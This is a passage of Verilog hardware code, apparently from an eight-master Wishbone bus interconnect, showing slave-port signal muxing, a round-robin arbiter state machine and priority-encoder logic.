    always @ (  ( ( ( s3_pri_sel == 2'd0 ) ) ? ( s3_arb_state ) : ( ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( s3_msel_arb0_state ) : ( ( ( ( s3_msel_pri_sel == 2'd1 ) ) ? ( s3_msel_sel1 ) : ( s3_msel_sel2 ) ) ) ) ) ) or  ( ( ( m0_slv_sel == 4'd3 ) ) ? ( m0_stb_i ) : ( 1'b0 ) ) or  ( ( ( m1_slv_sel == 4'd3 ) ) ? ( m1_stb_i ) : ( 1'b0 ) ) or  ( ( ( m2_slv_sel == 4'd3 ) ) ? ( m2_stb_i ) : ( 1'b0 ) ) or  ( ( ( m3_slv_sel == 4'd3 ) ) ? ( m3_stb_i ) : ( 1'b0 ) ) or  ( ( ( m4_slv_sel == 4'd3 ) ) ? ( m4_stb_i ) : ( 1'b0 ) ) or  ( ( ( m5_slv_sel == 4'd3 ) ) ? ( m5_stb_i ) : ( 1'b0 ) ) or  ( ( ( m6_slv_sel == 4'd3 ) ) ? ( m6_stb_i ) : ( 1'b0 ) ) or  ( ( ( m7_slv_sel == 4'd3 ) ) ? ( m7_stb_i ) : ( 1'b0 ) ))
    begin
        case ( ( ( ( s3_pri_sel == 2'd0 ) ) ? ( s3_arb_state ) : ( ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( s3_msel_arb0_state ) : ( ( ( ( s3_msel_pri_sel == 2'd1 ) ) ? ( s3_msel_sel1 ) : ( s3_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s3_wb_stb_o = ( ( ( m0_slv_sel == 4'd3 ) ) ? ( m0_stb_i ) : ( 1'b0 ) );
        end
        3'd1:
        begin
            s3_wb_stb_o = ( ( ( m1_slv_sel == 4'd3 ) ) ? ( m1_stb_i ) : ( 1'b0 ) );
        end
        3'd2:
        begin
            s3_wb_stb_o = ( ( ( m2_slv_sel == 4'd3 ) ) ? ( m2_stb_i ) : ( 1'b0 ) );
        end
        3'd3:
        begin
            s3_wb_stb_o = ( ( ( m3_slv_sel == 4'd3 ) ) ? ( m3_stb_i ) : ( 1'b0 ) );
        end
        3'd4:
        begin
            s3_wb_stb_o = ( ( ( m4_slv_sel == 4'd3 ) ) ? ( m4_stb_i ) : ( 1'b0 ) );
        end
        3'd5:
        begin
            s3_wb_stb_o = ( ( ( m5_slv_sel == 4'd3 ) ) ? ( m5_stb_i ) : ( 1'b0 ) );
        end
        3'd6:
        begin
            s3_wb_stb_o = ( ( ( m6_slv_sel == 4'd3 ) ) ? ( m6_stb_i ) : ( 1'b0 ) );
        end
        3'd7:
        begin
            s3_wb_stb_o = ( ( ( m7_slv_sel == 4'd3 ) ) ? ( m7_stb_i ) : ( 1'b0 ) );
        end
        endcase
    end
    assign s3_m0_ack_o = ( ( ( ( ( s3_pri_sel == 2'd0 ) ) ? ( s3_arb_state ) : ( ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( s3_msel_arb0_state ) : ( ( ( ( s3_msel_pri_sel == 2'd1 ) ) ? ( s3_msel_sel1 ) : ( s3_msel_sel2 ) ) ) ) ) ) == 3'd0 ) & s3_ack_i );
    assign s3_m1_ack_o = ( ( ( ( ( s3_pri_sel == 2'd0 ) ) ? ( s3_arb_state ) : ( ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( s3_msel_arb0_state ) : ( ( ( ( s3_msel_pri_sel == 2'd1 ) ) ? ( s3_msel_sel1 ) : ( s3_msel_sel2 ) ) ) ) ) ) == 3'd1 ) & s3_ack_i );
    assign s3_m2_ack_o = ( ( ( ( ( s3_pri_sel == 2'd0 ) ) ? ( s3_arb_state ) : ( ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( s3_msel_arb0_state ) : ( ( ( ( s3_msel_pri_sel == 2'd1 ) ) ? ( s3_msel_sel1 ) : ( s3_msel_sel2 ) ) ) ) ) ) == 3'd2 ) & s3_ack_i );
    assign s3_m3_ack_o = ( ( ( ( ( s3_pri_sel == 2'd0 ) ) ? ( s3_arb_state ) : ( ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( s3_msel_arb0_state ) : ( ( ( ( s3_msel_pri_sel == 2'd1 ) ) ? ( s3_msel_sel1 ) : ( s3_msel_sel2 ) ) ) ) ) ) == 3'd3 ) & s3_ack_i );
    assign s3_m4_ack_o = ( ( ( ( ( s3_pri_sel == 2'd0 ) ) ? ( s3_arb_state ) : ( ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( s3_msel_arb0_state ) : ( ( ( ( s3_msel_pri_sel == 2'd1 ) ) ? ( s3_msel_sel1 ) : ( s3_msel_sel2 ) ) ) ) ) ) == 3'd4 ) & s3_ack_i );
    assign s3_m5_ack_o = ( ( ( ( ( s3_pri_sel == 2'd0 ) ) ? ( s3_arb_state ) : ( ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( s3_msel_arb0_state ) : ( ( ( ( s3_msel_pri_sel == 2'd1 ) ) ? ( s3_msel_sel1 ) : ( s3_msel_sel2 ) ) ) ) ) ) == 3'd5 ) & s3_ack_i );
    assign s3_m6_ack_o = ( ( ( ( ( s3_pri_sel == 2'd0 ) ) ? ( s3_arb_state ) : ( ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( s3_msel_arb0_state ) : ( ( ( ( s3_msel_pri_sel == 2'd1 ) ) ? ( s3_msel_sel1 ) : ( s3_msel_sel2 ) ) ) ) ) ) == 3'd6 ) & s3_ack_i );
    assign s3_m7_ack_o = ( ( ( ( ( s3_pri_sel == 2'd0 ) ) ? ( s3_arb_state ) : ( ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( s3_msel_arb0_state ) : ( ( ( ( s3_msel_pri_sel == 2'd1 ) ) ? ( s3_msel_sel1 ) : ( s3_msel_sel2 ) ) ) ) ) ) == 3'd7 ) & s3_ack_i );
    assign s3_m0_err_o = ( ( ( ( ( s3_pri_sel == 2'd0 ) ) ? ( s3_arb_state ) : ( ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( s3_msel_arb0_state ) : ( ( ( ( s3_msel_pri_sel == 2'd1 ) ) ? ( s3_msel_sel1 ) : ( s3_msel_sel2 ) ) ) ) ) ) == 3'd0 ) & s3_err_i );
    assign s3_m1_err_o = ( ( ( ( ( s3_pri_sel == 2'd0 ) ) ? ( s3_arb_state ) : ( ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( s3_msel_arb0_state ) : ( ( ( ( s3_msel_pri_sel == 2'd1 ) ) ? ( s3_msel_sel1 ) : ( s3_msel_sel2 ) ) ) ) ) ) == 3'd1 ) & s3_err_i );
    assign s3_m2_err_o = ( ( ( ( ( s3_pri_sel == 2'd0 ) ) ? ( s3_arb_state ) : ( ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( s3_msel_arb0_state ) : ( ( ( ( s3_msel_pri_sel == 2'd1 ) ) ? ( s3_msel_sel1 ) : ( s3_msel_sel2 ) ) ) ) ) ) == 3'd2 ) & s3_err_i );
    assign s3_m3_err_o = ( ( ( ( ( s3_pri_sel == 2'd0 ) ) ? ( s3_arb_state ) : ( ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( s3_msel_arb0_state ) : ( ( ( ( s3_msel_pri_sel == 2'd1 ) ) ? ( s3_msel_sel1 ) : ( s3_msel_sel2 ) ) ) ) ) ) == 3'd3 ) & s3_err_i );
    assign s3_m4_err_o = ( ( ( ( ( s3_pri_sel == 2'd0 ) ) ? ( s3_arb_state ) : ( ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( s3_msel_arb0_state ) : ( ( ( ( s3_msel_pri_sel == 2'd1 ) ) ? ( s3_msel_sel1 ) : ( s3_msel_sel2 ) ) ) ) ) ) == 3'd4 ) & s3_err_i );
    assign s3_m5_err_o = ( ( ( ( ( s3_pri_sel == 2'd0 ) ) ? ( s3_arb_state ) : ( ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( s3_msel_arb0_state ) : ( ( ( ( s3_msel_pri_sel == 2'd1 ) ) ? ( s3_msel_sel1 ) : ( s3_msel_sel2 ) ) ) ) ) ) == 3'd5 ) & s3_err_i );
    assign s3_m6_err_o = ( ( ( ( ( s3_pri_sel == 2'd0 ) ) ? ( s3_arb_state ) : ( ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( s3_msel_arb0_state ) : ( ( ( ( s3_msel_pri_sel == 2'd1 ) ) ? ( s3_msel_sel1 ) : ( s3_msel_sel2 ) ) ) ) ) ) == 3'd6 ) & s3_err_i );
    assign s3_m7_err_o = ( ( ( ( ( s3_pri_sel == 2'd0 ) ) ? ( s3_arb_state ) : ( ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( s3_msel_arb0_state ) : ( ( ( ( s3_msel_pri_sel == 2'd1 ) ) ? ( s3_msel_sel1 ) : ( s3_msel_sel2 ) ) ) ) ) ) == 3'd7 ) & s3_err_i );
    assign s3_m0_rty_o = ( ( ( ( ( s3_pri_sel == 2'd0 ) ) ? ( s3_arb_state ) : ( ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( s3_msel_arb0_state ) : ( ( ( ( s3_msel_pri_sel == 2'd1 ) ) ? ( s3_msel_sel1 ) : ( s3_msel_sel2 ) ) ) ) ) ) == 3'd0 ) & s3_rty_i );
    assign s3_m1_rty_o = ( ( ( ( ( s3_pri_sel == 2'd0 ) ) ? ( s3_arb_state ) : ( ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( s3_msel_arb0_state ) : ( ( ( ( s3_msel_pri_sel == 2'd1 ) ) ? ( s3_msel_sel1 ) : ( s3_msel_sel2 ) ) ) ) ) ) == 3'd1 ) & s3_rty_i );
    assign s3_m2_rty_o = ( ( ( ( ( s3_pri_sel == 2'd0 ) ) ? ( s3_arb_state ) : ( ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( s3_msel_arb0_state ) : ( ( ( ( s3_msel_pri_sel == 2'd1 ) ) ? ( s3_msel_sel1 ) : ( s3_msel_sel2 ) ) ) ) ) ) == 3'd2 ) & s3_rty_i );
    assign s3_m3_rty_o = ( ( ( ( ( s3_pri_sel == 2'd0 ) ) ? ( s3_arb_state ) : ( ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( s3_msel_arb0_state ) : ( ( ( ( s3_msel_pri_sel == 2'd1 ) ) ? ( s3_msel_sel1 ) : ( s3_msel_sel2 ) ) ) ) ) ) == 3'd3 ) & s3_rty_i );
    assign s3_m4_rty_o = ( ( ( ( ( s3_pri_sel == 2'd0 ) ) ? ( s3_arb_state ) : ( ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( s3_msel_arb0_state ) : ( ( ( ( s3_msel_pri_sel == 2'd1 ) ) ? ( s3_msel_sel1 ) : ( s3_msel_sel2 ) ) ) ) ) ) == 3'd4 ) & s3_rty_i );
    assign s3_m5_rty_o = ( ( ( ( ( s3_pri_sel == 2'd0 ) ) ? ( s3_arb_state ) : ( ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( s3_msel_arb0_state ) : ( ( ( ( s3_msel_pri_sel == 2'd1 ) ) ? ( s3_msel_sel1 ) : ( s3_msel_sel2 ) ) ) ) ) ) == 3'd5 ) & s3_rty_i );
    assign s3_m6_rty_o = ( ( ( ( ( s3_pri_sel == 2'd0 ) ) ? ( s3_arb_state ) : ( ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( s3_msel_arb0_state ) : ( ( ( ( s3_msel_pri_sel == 2'd1 ) ) ? ( s3_msel_sel1 ) : ( s3_msel_sel2 ) ) ) ) ) ) == 3'd6 ) & s3_rty_i );
    assign s3_m7_rty_o = ( ( ( ( ( s3_pri_sel == 2'd0 ) ) ? ( s3_arb_state ) : ( ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( s3_msel_arb0_state ) : ( ( ( ( s3_msel_pri_sel == 2'd1 ) ) ? ( s3_msel_sel1 ) : ( s3_msel_sel2 ) ) ) ) ) ) == 3'd7 ) & s3_rty_i );
    assign s4_wb_data_i = s4_data_i;
    assign s4_data_o = s4_wb_data_o;
    assign s4_addr_o = s4_wb_addr_o;
    assign s4_sel_o = s4_wb_sel_o;
    assign s4_we_o = s4_wb_we_o;
    assign s4_cyc_o = s4_wb_cyc_o;
    assign s4_stb_o = s4_wb_stb_o;
    assign s4_wb_ack_i = s4_ack_i;
    assign s4_wb_err_i = s4_err_i;
    assign s4_wb_rty_i = s4_rty_i;
    always @ (  posedge clk_i)
    begin
        s4_next <=  ~( s4_wb_cyc_o);
    end
    assign s4_arb_req = { m7_s4_cyc_o, m6_s4_cyc_o, m5_s4_cyc_o, m4_s4_cyc_o, m3_s4_cyc_o, m2_s4_cyc_o, m1_s4_cyc_o, m0_s4_cyc_o };
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s4_arb_state <= s4_arb_grant0;
        end
        else
        begin 
            s4_arb_state <= s4_arb_next_state;
        end
    end
    always @ (  s4_arb_state or  { m7_s4_cyc_o, m6_s4_cyc_o, m5_s4_cyc_o, m4_s4_cyc_o, m3_s4_cyc_o, m2_s4_cyc_o, m1_s4_cyc_o, m0_s4_cyc_o } or  1'b0)
    begin
        s4_arb_next_state = s4_arb_state;
        case ( s4_arb_state ) 
        s4_arb_grant0:
        begin
            if (  !( s4_arb_req[0]) | 1'b0 ) 
            begin
                if ( s4_arb_req[1] ) 
                begin
                    s4_arb_next_state = s4_arb_grant1;
                end
                else
                begin 
                    if ( s4_arb_req[2] ) 
                    begin
                        s4_arb_next_state = s4_arb_grant2;
                    end
                    else
                    begin 
                        if ( s4_arb_req[3] ) 
                        begin
                            s4_arb_next_state = s4_arb_grant3;
                        end
                        else
                        begin 
                            if ( s4_arb_req[4] ) 
                            begin
                                s4_arb_next_state = s4_arb_grant4;
                            end
                            else
                            begin 
                                if ( s4_arb_req[5] ) 
                                begin
                                    s4_arb_next_state = s4_arb_grant5;
                                end
                                else
                                begin 
                                    if ( s4_arb_req[6] ) 
                                    begin
                                        s4_arb_next_state = s4_arb_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s4_arb_req[7] ) 
                                        begin
                                            s4_arb_next_state = s4_arb_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s4_arb_grant1:
        begin
            if (  !( s4_arb_req[1]) | 1'b0 ) 
            begin
                if ( s4_arb_req[2] ) 
                begin
                    s4_arb_next_state = s4_arb_grant2;
                end
                else
                begin 
                    if ( s4_arb_req[3] ) 
                    begin
                        s4_arb_next_state = s4_arb_grant3;
                    end
                    else
                    begin 
                        if ( s4_arb_req[4] ) 
                        begin
                            s4_arb_next_state = s4_arb_grant4;
                        end
                        else
                        begin 
                            if ( s4_arb_req[5] ) 
                            begin
                                s4_arb_next_state = s4_arb_grant5;
                            end
                            else
                            begin 
                                if ( s4_arb_req[6] ) 
                                begin
                                    s4_arb_next_state = s4_arb_grant6;
                                end
                                else
                                begin 
                                    if ( s4_arb_req[7] ) 
                                    begin
                                        s4_arb_next_state = s4_arb_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s4_arb_req[0] ) 
                                        begin
                                            s4_arb_next_state = s4_arb_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s4_arb_grant2:
        begin
            if (  !( s4_arb_req[2]) | 1'b0 ) 
            begin
                if ( s4_arb_req[3] ) 
                begin
                    s4_arb_next_state = s4_arb_grant3;
                end
                else
                begin 
                    if ( s4_arb_req[4] ) 
                    begin
                        s4_arb_next_state = s4_arb_grant4;
                    end
                    else
                    begin 
                        if ( s4_arb_req[5] ) 
                        begin
                            s4_arb_next_state = s4_arb_grant5;
                        end
                        else
                        begin 
                            if ( s4_arb_req[6] ) 
                            begin
                                s4_arb_next_state = s4_arb_grant6;
                            end
                            else
                            begin 
                                if ( s4_arb_req[7] ) 
                                begin
                                    s4_arb_next_state = s4_arb_grant7;
                                end
                                else
                                begin 
                                    if ( s4_arb_req[0] ) 
                                    begin
                                        s4_arb_next_state = s4_arb_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s4_arb_req[1] ) 
                                        begin
                                            s4_arb_next_state = s4_arb_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s4_arb_grant3:
        begin
            if (  !( s4_arb_req[3]) | 1'b0 ) 
            begin
                if ( s4_arb_req[4] ) 
                begin
                    s4_arb_next_state = s4_arb_grant4;
                end
                else
                begin 
                    if ( s4_arb_req[5] ) 
                    begin
                        s4_arb_next_state = s4_arb_grant5;
                    end
                    else
                    begin 
                        if ( s4_arb_req[6] ) 
                        begin
                            s4_arb_next_state = s4_arb_grant6;
                        end
                        else
                        begin 
                            if ( s4_arb_req[7] ) 
                            begin
                                s4_arb_next_state = s4_arb_grant7;
                            end
                            else
                            begin 
                                if ( s4_arb_req[0] ) 
                                begin
                                    s4_arb_next_state = s4_arb_grant0;
                                end
                                else
                                begin 
                                    if ( s4_arb_req[1] ) 
                                    begin
                                        s4_arb_next_state = s4_arb_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s4_arb_req[2] ) 
                                        begin
                                            s4_arb_next_state = s4_arb_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s4_arb_grant4:
        begin
            if (  !( s4_arb_req[4]) | 1'b0 ) 
            begin
                if ( s4_arb_req[5] ) 
                begin
                    s4_arb_next_state = s4_arb_grant5;
                end
                else
                begin 
                    if ( s4_arb_req[6] ) 
                    begin
                        s4_arb_next_state = s4_arb_grant6;
                    end
                    else
                    begin 
                        if ( s4_arb_req[7] ) 
                        begin
                            s4_arb_next_state = s4_arb_grant7;
                        end
                        else
                        begin 
                            if ( s4_arb_req[0] ) 
                            begin
                                s4_arb_next_state = s4_arb_grant0;
                            end
                            else
                            begin 
                                if ( s4_arb_req[1] ) 
                                begin
                                    s4_arb_next_state = s4_arb_grant1;
                                end
                                else
                                begin 
                                    if ( s4_arb_req[2] ) 
                                    begin
                                        s4_arb_next_state = s4_arb_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s4_arb_req[3] ) 
                                        begin
                                            s4_arb_next_state = s4_arb_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s4_arb_grant5:
        begin
            if (  !( s4_arb_req[5]) | 1'b0 ) 
            begin
                if ( s4_arb_req[6] ) 
                begin
                    s4_arb_next_state = s4_arb_grant6;
                end
                else
                begin 
                    if ( s4_arb_req[7] ) 
                    begin
                        s4_arb_next_state = s4_arb_grant7;
                    end
                    else
                    begin 
                        if ( s4_arb_req[0] ) 
                        begin
                            s4_arb_next_state = s4_arb_grant0;
                        end
                        else
                        begin 
                            if ( s4_arb_req[1] ) 
                            begin
                                s4_arb_next_state = s4_arb_grant1;
                            end
                            else
                            begin 
                                if ( s4_arb_req[2] ) 
                                begin
                                    s4_arb_next_state = s4_arb_grant2;
                                end
                                else
                                begin 
                                    if ( s4_arb_req[3] ) 
                                    begin
                                        s4_arb_next_state = s4_arb_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s4_arb_req[4] ) 
                                        begin
                                            s4_arb_next_state = s4_arb_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s4_arb_grant6:
        begin
            if (  !( s4_arb_req[6]) | 1'b0 ) 
            begin
                if ( s4_arb_req[7] ) 
                begin
                    s4_arb_next_state = s4_arb_grant7;
                end
                else
                begin 
                    if ( s4_arb_req[0] ) 
                    begin
                        s4_arb_next_state = s4_arb_grant0;
                    end
                    else
                    begin 
                        if ( s4_arb_req[1] ) 
                        begin
                            s4_arb_next_state = s4_arb_grant1;
                        end
                        else
                        begin 
                            if ( s4_arb_req[2] ) 
                            begin
                                s4_arb_next_state = s4_arb_grant2;
                            end
                            else
                            begin 
                                if ( s4_arb_req[3] ) 
                                begin
                                    s4_arb_next_state = s4_arb_grant3;
                                end
                                else
                                begin 
                                    if ( s4_arb_req[4] ) 
                                    begin
                                        s4_arb_next_state = s4_arb_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s4_arb_req[5] ) 
                                        begin
                                            s4_arb_next_state = s4_arb_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s4_arb_grant7:
        begin
            if (  !( s4_arb_req[7]) | 1'b0 ) 
            begin
                if ( s4_arb_req[0] ) 
                begin
                    s4_arb_next_state = s4_arb_grant0;
                end
                else
                begin 
                    if ( s4_arb_req[1] ) 
                    begin
                        s4_arb_next_state = s4_arb_grant1;
                    end
                    else
                    begin 
                        if ( s4_arb_req[2] ) 
                        begin
                            s4_arb_next_state = s4_arb_grant2;
                        end
                        else
                        begin 
                            if ( s4_arb_req[3] ) 
                            begin
                                s4_arb_next_state = s4_arb_grant3;
                            end
                            else
                            begin 
                                if ( s4_arb_req[4] ) 
                                begin
                                    s4_arb_next_state = s4_arb_grant4;
                                end
                                else
                                begin 
                                    if ( s4_arb_req[5] ) 
                                    begin
                                        s4_arb_next_state = s4_arb_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s4_arb_req[6] ) 
                                        begin
                                            s4_arb_next_state = s4_arb_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    assign s4_msel_req = { m7_s4_cyc_o, m6_s4_cyc_o, m5_s4_cyc_o, m4_s4_cyc_o, m3_s4_cyc_o, m2_s4_cyc_o, m1_s4_cyc_o, m0_s4_cyc_o };
    assign s4_msel_pri_enc_valid = { m7_s4_cyc_o, m6_s4_cyc_o, m5_s4_cyc_o, m4_s4_cyc_o, m3_s4_cyc_o, m2_s4_cyc_o, m1_s4_cyc_o, m0_s4_cyc_o };
    always @ (  s4_msel_pri_enc_valid[0] or  { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[1] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[0] ) ) })
    begin
        if (  !( s4_msel_pri_enc_valid[0]) ) 
        begin
            s4_msel_pri_enc_pd0_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[1] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[0] ) ) } == 2'h0 ) 
            begin
                s4_msel_pri_enc_pd0_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[1] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[0] ) ) } == 2'h1 ) 
                begin
                    s4_msel_pri_enc_pd0_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[1] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[0] ) ) } == 2'h2 ) 
                    begin
                        s4_msel_pri_enc_pd0_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s4_msel_pri_enc_pd0_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s4_msel_pri_enc_valid[0] or  { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[1] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[0] ) ) })
    begin
        if (  !( s4_msel_pri_enc_valid[0]) ) 
        begin
            s4_msel_pri_enc_pd0_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[1] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[0] ) ) } == 2'h0 ) 
            begin
                s4_msel_pri_enc_pd0_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s4_msel_pri_enc_pd0_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s4_msel_pri_enc_valid[1] or  { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[3] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[2] ) ) })
    begin
        if (  !( s4_msel_pri_enc_valid[1]) ) 
        begin
            s4_msel_pri_enc_pd1_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[3] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[2] ) ) } == 2'h0 ) 
            begin
                s4_msel_pri_enc_pd1_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[3] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[2] ) ) } == 2'h1 ) 
                begin
                    s4_msel_pri_enc_pd1_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[3] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[2] ) ) } == 2'h2 ) 
                    begin
                        s4_msel_pri_enc_pd1_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s4_msel_pri_enc_pd1_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s4_msel_pri_enc_valid[1] or  { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[3] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[2] ) ) })
    begin
        if (  !( s4_msel_pri_enc_valid[1]) ) 
        begin
            s4_msel_pri_enc_pd1_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[3] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[2] ) ) } == 2'h0 ) 
            begin
                s4_msel_pri_enc_pd1_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s4_msel_pri_enc_pd1_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s4_msel_pri_enc_valid[2] or  { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[5] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[4] ) ) })
    begin
        if (  !( s4_msel_pri_enc_valid[2]) ) 
        begin
            s4_msel_pri_enc_pd2_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[5] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[4] ) ) } == 2'h0 ) 
            begin
                s4_msel_pri_enc_pd2_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[5] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[4] ) ) } == 2'h1 ) 
                begin
                    s4_msel_pri_enc_pd2_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[5] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[4] ) ) } == 2'h2 ) 
                    begin
                        s4_msel_pri_enc_pd2_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s4_msel_pri_enc_pd2_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s4_msel_pri_enc_valid[2] or  { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[5] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[4] ) ) })
    begin
        if (  !( s4_msel_pri_enc_valid[2]) ) 
        begin
            s4_msel_pri_enc_pd2_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[5] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[4] ) ) } == 2'h0 ) 
            begin
                s4_msel_pri_enc_pd2_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s4_msel_pri_enc_pd2_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s4_msel_pri_enc_valid[3] or  { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[7] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[6] ) ) })
    begin
        if (  !( s4_msel_pri_enc_valid[3]) ) 
        begin
            s4_msel_pri_enc_pd3_pri_out_d1 = 4'b0001;
        end
        else
        begin 
